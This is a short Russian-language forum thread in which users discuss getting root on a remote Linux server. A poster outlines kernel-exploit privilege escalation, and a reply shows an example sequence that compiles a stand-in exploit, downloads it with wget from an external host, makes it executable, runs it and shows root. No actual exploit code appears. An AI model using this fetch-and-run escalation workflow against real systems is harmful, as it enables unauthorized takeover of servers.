Реально, если на удалённой машине есть уязвимости/лазейки для повышения привелегий

3amunyk сказал(а):

По ядру искать уязвимости в метасплоите ?


Не в метасплойте. Узнай какой софт установлен - его версии - в том числе и ядро. Посмотри, есть ли gcc на серваке. Если есть - ищи подходящий сплойт - собирай - получай рута. Если нет gcc - поднимай на виртуалке подобную систему с подобным ядром - собирай у себя - заливай бинарник - получай рута. Ну это как пример. Если сплойт на перле - есесно тебе нужен интерпретатор на сервере. В общем логика такая.

3amunyk сказал(а):

Вот тут не понял ) как бинарник соберу ?


gcc super_sploit.c -o super_sploit
wget http://xackep.site/super_sploit
chmod +x super_sploit
./super_sploit
whoami
root

p.r0phe.t сказал(а):

gcc super_sploit.c -o super_sploit
wget http://xackep.site/super_sploit
chmod +x super_sploit
./super_sploit
whoami
root


как в кино прям )